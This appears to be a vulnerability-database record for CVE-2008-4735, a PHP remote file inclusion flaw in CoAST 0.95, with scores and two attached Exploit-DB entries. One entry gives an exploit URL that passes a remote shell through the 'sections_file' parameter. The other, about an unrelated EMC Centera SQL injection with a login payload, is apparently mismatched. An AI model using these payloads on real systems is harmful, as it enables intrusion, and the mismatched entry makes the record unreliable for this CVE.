CVE-2008-4735
Published 2008-10-24
Priority P3 (46), high, CVSS 2.0 score 8.5
Vector: AV:N/AC:M/Au:S/C:C/I:C/A:C
EXPLOIT
EPSS: 2.33% (81.4th percentile)
PHP remote file inclusion vulnerability in header.php in Concord Asset, Software, and Ticket system (CoAST) 0.95 allows remote attackers to execute arbitrary PHP code via a URL in the sections_file parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coastal | coast | — | — |
No detection rules found.
Exploit-DB
CoAST 0.95 - 'sections_file' Remote File Inclusion
exploitdb·2008-09-27
CVE-2008-4735 CoAST 0.95 - 'sections_file' Remote File Inclusion
---
Author : By DaRkLiFe
Greetz : str0ke & S.VV.A.T.
Script : The Concord Asset, Software, and Ticket system(CoAST) 0.95 Remote File Inclusion Vulnerability
Download : http://downloads.sourceforge.net/coastal/coast-0.95.tgz?modtime=1222363198&big_mirror=0
Exploit : Site.com/script_path/coast/header.php?sections_file=Shellz?
The header.php.dist file exists and it has to be renamed into header.php as given in instructions.
Vulnerable : line 201 :
THANKS ! GREETZ !
# milw0rm.com [2008-09-27]
Exploit-DB
EMC Centera Universal Access 4.0_4735.p4 - 'Username' SQL Injection
exploitdb·2008-07-23
CVE-2008-3370 EMC Centera Universal Access 4.0_4735.p4 - 'Username' SQL Injection
---
source: https://www.securityfocus.com/bid/30358/info
EMC Centera Universal Access (CUA) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CUA 4.0_4735.p4 is vulnerable; other versions may also be affected.
Username: valid_user_name
Password: --
No writeups or analysis indexed.
Published: 2008-10-24